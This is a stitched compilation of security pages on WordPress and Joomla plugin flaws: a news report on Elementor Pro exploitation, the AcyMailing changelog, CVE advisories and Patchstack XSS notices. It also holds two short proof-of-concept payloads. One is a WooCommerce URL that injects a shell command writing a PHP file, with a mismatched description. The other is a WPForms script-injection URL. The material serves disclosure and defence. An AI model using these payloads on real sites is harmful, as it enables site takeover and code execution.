Unknown threat actors are actively exploiting a recently patched security vulnerability in the Elementor Pro website builder plugin for WordPress.
The flaw, described as a case of broken access control, impacts versions 3.11.6 and earlier. It was addressed by the plugin maintainers in version 3.11.7 released on March 22.
"Improved code security enforcement in WooCommerce components," the

Web Security / Cyber Threat

Unknown threat actors are actively exploiting a recently patched security vulnerability in the Elementor Pro website builder plugin for WordPress.

The flaw, described as a case of broken access control, impacts versions 3.11.6 and earlier. It was addressed by the plugin maintainers in version 3.11.7 released on March 22.

"Improved code security enforcement in WooCommerce components," the Elementor said in its release notes. The premium plugin is estimated to be used on over 12 million sites.

Successful exploitation of the high-severity flaw allows an authenticated attacker to complete a takeover of a WordPress site that has WooCommerce enabled.

"This makes it possible for a malicious user to turn on the registration page (if disabled) and set the default user role to administrator so they can create an account that instantly has the administrator privileges," Patchstack said in an alert of March 30, 2023.

"After this, they are likely to either redirect the site to another malicious domain or upload a malicious plugin or backdoor to further exploit the site."

Credited with discovering and reporting the vulnerability on March 18, 2023, is NinTechNet security researcher Jerome Bruandet.

Patchstack further noted that the flaw is currently being abused in the wild from several IP addresses intending to upload arbitrary PHP and ZIP archive files.

Users of the Elementor Pro plugin are recommended to update to 3.11.7 or 3.12.0, which is the latest version, as soon as possible to mitigate potential threats.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

The advisory comes over a year after the Essential Addons for Elementor plugin was found to contain a critical vulnerability that could result in the execution of arbitrary code on compromised websites.

Last week, WordPress issued auto-updates to remediate another critical bug in the WooCommerce Payments plugin that allowed unauthenticated attackers to gain administrator access to vulnerable sites.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploiting WordPress Elementor Pro Vulnerability: Millions of Sites at Risk!

WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.

    # Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:simple, easy to use jQuery frontend to php backend that pings variousdevices and changes colors from green to red depending on if device isup or down.# PoC :http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.phphttp://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php# Vulnerabile code: 95: $classname $classname($post_id);   94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');     92: ⇓ function save($post_id, $post)       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));           92: ⇓ function save($post_id, $post)

WordPress WooCommerce 7.1.0 Remote Code Execution

WordPress WPForms plugin version 1.7.8 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)# Date: 2022-12-05# Author: Milad karimi# Software Link: https://wordpress.org/plugins/wpforms-lite# Version: 1.7.8# Tested on: Windows 10# CVE: N/A1. Description:This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.2. Proof of Concept:https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

WordPress WPForms 1.7.8 Cross Site Scripting

AnyMailing Joomla Plugin is vulnerable to stored cross site scripting (XSS) in templates and emails of AcyMailing, exploitable without authentication when access is granted to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.

*   **AcyMailing 5.10.18**
    
    December 10, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.3**
    
    December 18, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.19.2**
    
    December 10, 2020
    
    **Improvements**
    
    *   New button to be redirected on the wordpress support of AcyMailing
    
    **Bug fixes**
    
*   **AcyMailing 6.19.1**
    
    December 9, 2020
    
    **Bug fixes**
    
*   **AcyMailing 5.10.17**
    
    December 2, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.0**
    
    December 1, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.18.2**
    
    November 12, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.18.0**
    
    November 9, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.17.1**
    
    October 28, 2020
    
    **Bug fixes**
    
    *   Fixed date for scheduled campaign showing with the timezone
    
*   **AcyMailing 6.17.0**
    
    October 19, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.16**
    
    October 15, 2020
    
    **Features**
    
    *   A new plugin lets you restrict the available fields when importing users from the front-end
    
    **Improvements & fixes**
    
*   **AcyMailing 6.16.4**
    
    October 8, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.3**
    
    October 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.2**
    
    October 1, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.1**
    
    September 29, 2020
    
    **Bug fixes**
    
    *   Hide php warning from other plugins
    
*   **AcyMailing 6.16.0**
    
    September 28, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.15.1**
    
    Septempber 9, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.15.0**
    
    September 7, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.14.1**
    
    August 19, 2020
    
    **Improvements**
    
    *   Remove check version in the starter version
    
    **Bug fixes**
    
*   **AcyMailing 6.14.0**
    
    August 17, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.15**
    
    August 7, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.13.3**
    
    August 3, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.2**
    
    July 30, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.1**
    
    July 29, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.0**
    
    July 27, 2020
    
    **New features**
    
    *   New design and UX for listing toolbar
    *   Added the possibility to create a list on the import in the list selection modal
    *   Added settings for the following add-ons: article, DOCman, DPcalendar, Easyblog, Easyprofile, EventBooking, FlexiContent, Hikashop, ICagenda, JDownloads, JEvent, K2, RSEventPro, RSS, Seblod, Virtumart
    *   Added settings for the following add-ons: post, page, RSS, The Event Calendar, Woocommerce
    *   New Giphy integration in the drag and drop editor
    *   Added the possibility to create custom view for each add-on to override the content inserted in the drag and drop editor
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.12.1**
    
    July 27, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.12.0**
    
    July 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.11.1**
    
    June 17, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.11.0**
    
    June 15, 2020
    
    **New features****Improvements**
    
    *   You can now add a message at the beginning of emails sent as tests
    *   Better display for the dynamic content insertion options (insertion of site articles in an email for example)
    *   The emails listing has been re-made: the "Campaigns" menu is renamed into "Emails" and the listing show four types of email
    *   The user listing has been improved, the data is displayed in a better way, and you can filter users by subscription
    *   The email creation has been improved, you can now pre-select the type of email you want to create (campaign / auto / scheduled / welcome / unsubscribe)
    *   You can now Unsubscribe / re-subscribe for all the lists at a time in the user edition page
    *   The bounce rule creation page has been improved and a presentation of the bounce handling feature has been added
    *   New export button on the lists listing to export subscribers
    *   The custom fields edition page has been redesigned and simplified
    *   The lists listing page has been improved and more information has been added
    *   New description field for lists, it will be added on the profile page as a tooltip in a future release
    *   The user "Source" is now easier to understand
    *   Cancel buttons added in various locations (import / export / mail edition...)
    *   New full translation in Japanese, Lithuanian, Spanish
    *   More translations in Catalan, Czech, Dutch, German, German (Switzerland), Norwegian (Bokmål), Polish, Romanian, Slovenian, Swedish
    
    **Bug fixes**
    
*   **AcyMailing 6.10.4**
    
    May 13, 2020
    
    **Improvements**
    
    *   PHP 7.4 compatibility
    *   Much easier way to attach a site with a license in the configuration
    *   The length of the "Email preview line" option is now limited to 255 characters
    *   The "Every week on Monday, Friday" trigger now takes the site's timezone into account in automations and periodic campaigns
    *   New security added on the custom fields names and unique code generation
    *   Better custom fields migration from the v5
    *   The shared servers email addresses are now handled in the bounce handling
    *   A new "revealonline" CSS class is now available, to hide something in the receiver's mailbox and show it on the online version
    *   New full Serbian translation
    *   Translation update and corrections for Danish, German, Finnish, French, Norwegian, Romanian, Russian, Slovenian, Swedish, Turkish and Ukrainian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.14**
    
    May 13, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.10.2**
    
    April 21, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.10.1**
    
    April 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.10.0**
    
    April 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.9.2**
    
    March 23, 2020
    
    Vulnerability on file upload fixed when having admin access to AcyMailing pages. Any wrong file uploaded will be cleaned during the update process.  
    We strongly recommend to update AcyMailing as soon as possible, more information will be added in the related CVE
    
    **Bug fixes**
    
*   **AcyMailing 6.9**
    
    March 9, 2020
    
    **Improvements**
    
    *   The user import choices are now stored
    *   Greatly improved performances on the click tracking system, emails should be sent much faster
    *   Added the "hideonline" CSS class on emails. When added on an element, it will be hidden on the archive and "View it online" link
    *   Added the click statistics on the campaigns listing
    *   The detailed statistics are now no longer ordered randomly if the sending date is the same for every user
    *   You can now search multiple words in the dropdown fields (like the mail selection dropdown in the statistics page)
    *   Improved the "Check database integrity" feature to clean data from some AcyMailing tables, and translate result
    *   Improved the way custom fields are displayed when inserted in an email, for dropdown, radio and checkbox fields
    *   The welcome email is now not sent when the user isn’t active
    *   Better display for the "Send settings" step of campaigns
    *   Queued emails are now automatically removed for inactive users two days after the sending date
    *   \[addon\] New add-on for ICagenda, event insertion and user filter by event subscription
    *   \[addon\] Added compatibility with HikaShop 4
    *   Added multi-language compatibility when inserting articles in emails (for the link applied on the title)
    *   Tracked links are not processed by the sef system anymore, for special sef extension compatibility
    *   Improved the router for a better compatibility with the Joomla sef system on unsubscribe and online links, for multi-language sites
    *   AcyMailing will now instantly know it when you attached your website to your license when trying to update in WordPress
    *   A better url is used for the "Terms and conditions" post
    *   Code adaptation for WordPress standards
    *   Added compatibility with the plugin Schema and structured data for wp
    *   More translations for Chinese, Norwegian, Romanian, Slovenian
    *   Full Swedish translation
    
    **Bug fixes**
    
*   **AcyMailing 5.10.13**
    
    March 3, 2020
    
    **Modifications**
    
*   **AcyMailing 6.8**
    
    February 3, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.7**
    
    January 13, 2020
    
    **New features****Improvements**
    
    *   Editor: auto-hide the test zone if the email is successfully sent
    *   Editor: the title is now added on inserted images
    *   Editor: when inserting a separator, a new option lets you add some space below and above
    *   Editor: the drag & drop editor now opens in full screen mode
    *   Better interface for the "Test" step of the Campaign's edition page
    *   Improved the AcyMailing left menu when the window is resized
    *   Improved the AcyMailing header's display on small screens and tablets
    *   "Cancel" buttons have been added on multiple edition pages (List, user, bounce rule, custom field...)
    *   The add-ons are now ordered alphabetically for an easier search
    *   Improved performances on style and script loading for each AcyMailing page
    *   The FontAwesome library isn't loaded anymore, used fonts are now embed in AcyMailing to improve the page load speed
    *   New option in the mail configuration to disable automatic hyphens in paragraphs for sent emails
    *   New option to show the site's header on the unsubscribe page
    *   The "Bounce email address" option is now available in the free version in the "Mail settings" tab of the configuration
    *   In the bounce handling system, you can now connect to a mailbox using the "Pop3 without imap extension" method
    *   The "source" is automatically completed when a new AcyMailing user is created
    *   Automations: added a confirmation when deleting an email in the "Add an email in the queue" action
    *   Translation improvements: German, French, Hungarian, Norwegian, Russian, Turkish, Ukrainian
    *   New full translation: Slovenian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.12**
    
    January 10, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.6.0**
    
    December 2, 2019
    
    **New features****Improvements**
    
    *   All the add-ons now have options for the automatic campaigns to automatically send the new content to your users
    *   Better alignment for Follow buttons in Outlook 2007 - 2010
    *   Better UX for the list's edition page
    *   The shown statistics numbers are now consistent in the campaigns listing and the statistics page
    *   In some mail clients, a 1px border may appear around your emails, this is no longer the case
    *   The mobile preview has been inproved, and no more double scrollbar
    *   The default templates have been remade to include this version's improvements
    *   The campaign's settings are now applied on the dynamic content inserted in your emails (like the site's articles/posts)
    *   Improved the campaigns edition page display and removed the hint popup
    *   Compatibility with the GDPR plugin
    *   The Add-ons menu is now translated in the Joomla menu
    *   The "Price text" field is now taken into account in the EventBooking add-on
    *   New partial translations, imported from AcyMailing 5: Arabic, Bosnian, Bulgarian, Catalan, Chinese, Croatian, Estonian, Finnish, Galician, Hebrew, Icelandic, Indonesian, Japanese, Latvian, Lithuanian, Macedonian, Persian, Serbian, Sindhi, Swahili, Thai, Urdu, Vietnamese, Welsh
    
    **Bug fixes**
    
*   **AcyMailing 5.10.11**
    
    November 27, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.5.0**
    
    November 5, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.4.0**
    
    October 14, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.3.1**
    
    September 25, 2019
    
    **Bug fixes**
    
*   **AcyMailing 6.3.0**
    
    September 23, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.2.2**
    
    August 30, 2019
    
    This is a patch release to address a security issue on the file upload custom field. We highly recommend to update to the v6.2.2 as soon as possible for websites matching all of the following conditions:
    
    *   The Enterprise edition of AcyMailing is used
    *   The version 6.2.0 or 6.2.1 is used
    *   A "File" custom field is created and visible for the users in a front-end subscription form (the module on Joomla or the widget on WordPress)
    *   An other custom field other than a "File" field must be displayed on the form, in addition to the "Name", "Email" and "File" fields
    
    If your website doesn't match one of these conditions it is not concerned by the security issue, but we still recommend you to keep AcyMailing updated when a new version is available.
    
*   **AcyMailing 5.10.10**
    
    August 28, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.1**
    
    August 27, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.0**
    
    August 20, 2019
    
    **New features and improvements****Bug fixes**
    
*   **AcyMailing 6.1.10**
    
    August 5, 2019
    
    **Bug fixes**
    
*   **AcyMailing 5.10.9**
    
    July 31, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.1.9**
    
    July 30, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.8**
    
    July 15, 2019
    
    There aren't much modifications in this version, but it had to be released as the "Send settings" step of the campaigns edition workflow could be blocked in some cases when scheduling the campaign, saving as draft then returning on this step.
    
    **Modifications**
    
*   **AcyMailing 6.1.7**
    
    July 8, 2019
    
    **Improvements****Bug fixes****Integrations**
    
*   **AcyMailing 6.1.6**
    
    June 18, 2019
    
    This version is mainly an improvements and maintenance release, mainly focusing on the editor and sent emails.
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 5.10.8**
    
    June 18, 2019
    
    **Improvements****Bug fixes****Plugins**
    
*   **AcyMailing 6.1.5**
    
    June 3, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.4**
    
    April 23, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.3**
    
    April 2, 2019
    
*   **AcyMailing 5.10.7**
    
    March 25, 2019
    
*   **AcyMailing 5.10.6**
    
    March 18, 2019
    
*   **AcyMailing 6.1.2**
    
    March 11, 2019
    
*   **AcyMailing 6.1.1**
    
    February 13, 2019
    
*   **AcyMailing 6.0.4**
    
    February 6, 2019
    
*   **AcyMailing 5.10.5**
    
    January 10, 2019
    
*   **AcyMailing 6.0.3**
    
    January 9, 2019
    
*   **AcyMailing 6.0.2**
    
    December 17, 2018
    
*   **AcyMailing 6.0.1**
    
    November 28, 2018
    
*   **AcyMailing 6 Beta**
    
    November 19, 2018
    
*   **AcyMailing 6 Alpha 3**
    
    October 2, 2018
    
*   **AcyMailing 6 Alpha 2**
    
    August 29, 2018
    
*   **AcyMailing 6 Alpha 1**
    
    August 22, 2018

CVE-2023-28733: Changelog - AcyMailing

Missing access control in AnyMailing Joomla Plugin allows to list and access files containing sensitive information from the plugin itself and access to system files via path traversal, when being granted access to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin in versions below 8.3.0.

**Advisory CVE-2023-28732, Missing access control affecting the AcyMailing plugin for Joomla**

**CVE ID**: CVE-2023-28732 

**Vendor**: AcyMailing 

**Product**: Newsletter Plugin for Joomla 

**Title**: Missing access control affecting the AcyMailing plugin for Joomla 

**Vulnerable Versions**: < 8.3.0 

**Problem Type (CWE)**:  

*   CWE-20 Improper Input Validation 
*   CWE-200 Exposure of Sensitive Information to an Unauthorized Actor 

**Impacts (CAPEC)**:  

*   CAPEC-115 Authentication Bypass 
*   CAPEC-126 Path Traversal 

**CVSS 3.1**: 

*   6.5 Medium 
*   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 

**Source Repository (OSS)**: https://github.com/acyba/acymailing/  

**References**:  

*   https://www.acymailing.com/change-log/  
*   https://github.com/acyba/acymailing/releases/tag/v8.3.0 
*   https://www.bugbounty.ch/advisories/CVE-2023-28732  

**CVE Description**: 

Introduction: 

AcyMailing is a newsletter and email marketing plugin available for Joomla and WordPress. 

The vulnerability: 

Missing access control allows to list and access files containing sensitive information from the plugin itself and access to system files due to path traversal, when being granted access to the campaign’s creation on front-office. 

This issue affects AnyMailing Joomla Plugin in versions below 8.3.0. 

The steps to exploit the vulnerability: 

*   Campaign creation access needs to be enabled on the front-office, the following steps can then be done unauthenticated 
*   Manipulate the URL to list and get access to the logs of the plugin itself, leaking PII of users 
*   Manipulate the URL to list and get access to system files (e.g. in the root directory of Joomla). Only allowed file-types can be listed and accessed 
*   Upload arbitrary files. Only allowed file-types can be uploaded 

How to check for exploitation: 

*   Check access logs for requests in the form of “/component/acym/frontfile.html?currentFolder=media/com\_acym/upload/logs” or suspicious access to files in “/media/com\_acym/upload/logs/” 
*   Check access logs for requests in the form of “/component/acym/frontfile.html?currentFolder=media/com\_acym/upload/logs/../../../..” or suspicious access to allowed file-types on the entire system accessible by the user of the webserver 
*   Check for suspicious files uploaded in /media/com\_acym/upload/ 
*   Default allowed file-types are: zip, doc, docx, pdf, xls, txt, gzip, rar, jpg, jpeg, gif, xlsx, pps, csv, bmp, ico, odg, odp, ods, odt, png, ppt, swf, xcf, mp3, wma 

**Solution**: 

*   update to a fixed version (>= 8.3.0) 

**Timeline**: 

*   2023-02-01: reported 
*   2023-03-09: initial vendor notification 
*   2023-03-10: initial vendor response 
*   2023-03-20: release of fixed version 
*   2023-03-30: coordinated public disclosure 

**Credits**: 

*   Reporter: Raphaël Arrouas (“Xel”), on a bug bounty program of Bug Bounty Switzerland 
*   Coordinator: Bug Bounty Switzerland 

Diese Website verwendet Cookies, um Ihr Nutzererlebnis zu verbessern. Wir gehen davon aus, dass Sie damit einverstanden sind. Wenn nicht können sie die Cookie Einstellungen anpassen.  

  
  
Akzeptieren

CVE-2023-28732: CVE-2023-28732 - Bug Bounty Switzerland

AnyMailing Joomla Plugin is vulnerable to unauthenticated remote code execution, when being granted access to the campaign's creation on front-office due to unrestricted file upload allowing PHP code to be injected. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.

**Advisory CVE-2023-28731, Unauthenticated RCE affecting the AcyMailing plugin for Joomla**

**CVE ID**: CVE-2023-28731 

**Vendor**: AcyMailing 

**Product**: Newsletter Plugin for Joomla in the Enterprise version 

**Title**: Unauthenticated RCE affecting the AcyMailing plugin for Joomla 

**Vulnerable Versions**: < 8.3.0 

**Problem Type (CWE)**:  

*   CWE-20 Improper Input Validation 
*   CWE-434 Unrestricted Upload of File with Dangerous Type 

**Impacts (CAPEC)**: CAPEC-242 Code Injection 

**CVSS 3.1**:  

*   9.8 Critical 
*   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 

**References**:  

*   https://www.acymailing.com/change-log/  
*   https://www.bugbounty.ch/advisories/CVE-2023-28731  

**CVE Description:** 

Introduction: 

AcyMailing is a newsletter and email marketing plugin available for Joomla and WordPress. 

The vulnerability: 

Unrestricted upload of files allows PHP code to be injected, leading to unauthenticated remote code execution, when being granted access to the campaign’s creation on front-office. 

This issue affects AnyMailing Joomla Plugin in versions below 8.3.0. 

The steps to exploit the vulnerability: 

*   Campaign creation access needs to be enabled on the front-office, the following steps can then be done unauthenticated 
*   Editing an AcyMailing template and initiate sending a test email 
*   One of the resulting requests sent to the plugin sets a thumbnail, this request can be manipulated and accepts PHP code, which gets stored on the system 
*   The resulting PHP file is accessible and enables execution of the injected code 

How to check for exploitation: 

*   The thumbnails are stored in the following location: /media/com\_acym/images/thumbnails/ 
*   Signs of a successful exploitation would be the presence of PHP files in this directory 
*   Check for suspicious POST requests similar to “/index.php?option=com\_acym&tmpl=component&4f0877f7c82462a794cb5a042282dbf0=1&ctrl=frontmails&task=setNewThumbnail” 

**Solution**: 

*   update to a fixed version (>= 8.3.0) 

**Workaround**: 

*   Prevent the execution of PHP files in the thumbnail directory to prevent the injected code from being executed 

**Timeline**: 

*   2023-02-01: reported 
*   2023-03-09: initial vendor notification 
*   2023-03-10: initial vendor response 
*   2023-03-20: release of fixed version 
*   2023-03-30: coordinated public disclosure 

**Credits**: 

*   Reporter: Raphaël Arrouas (“Xel”), on a bug bounty program of Bug Bounty Switzerland 
*   Coordinator: Bug Bounty Switzerland 

Diese Website verwendet Cookies, um Ihr Nutzererlebnis zu verbessern. Wir gehen davon aus, dass Sie damit einverstanden sind. Wenn nicht können sie die Cookie Einstellungen anpassen.  

  
  
Akzeptieren

CVE-2023-28731: CVE-2023-28731 - Bug Bounty Switzerland

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Vova Anokhin WordPress Shortcodes Plugin — Shortcodes Ultimate plugin <= 5.12.6 versions.

**Solution**

Update the WordPress Shortcodes Ultimate plugin to the latest available version (at least 5.12.7).

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Shortcodes Ultimate Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 5.12.7.

**6 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-25040: WordPress Shortcodes Ultimate plugin <= 5.12.6 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in OceanWP Ocean Extra plugin <= 2.1.2 versions.

**Solution**

Update the WordPress Ocean Extra plugin to the latest available version (at least 2.1.3).

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Ocean Extra Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.1.3.

**9 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-24399: WordPress Ocean Extra plugin <= 2.1.2 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Labib Ahmed Image Hover Effects For WPBakery Page Builder plugin <= 4.0 versions.

**Solution**

Update the WordPress Image Hover Effects For WPBakery Page Builder plugin to the latest available version (at least 5.0).

Lana Codes discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Image Hover Effects For WPBakery Page Builder Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 5.0.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23681: WordPress Image Hover Effects For WPBakery Page Builder plugin <= 4.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Catchsquare WP Smart Preloader plugin <= 1.15 versions.

**Solution**

Update the WordPress WP Smart Preloader plugin to the latest available version (at least 1.15.1).

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Smart Preloader Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.15.1.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

Tag

#wordpress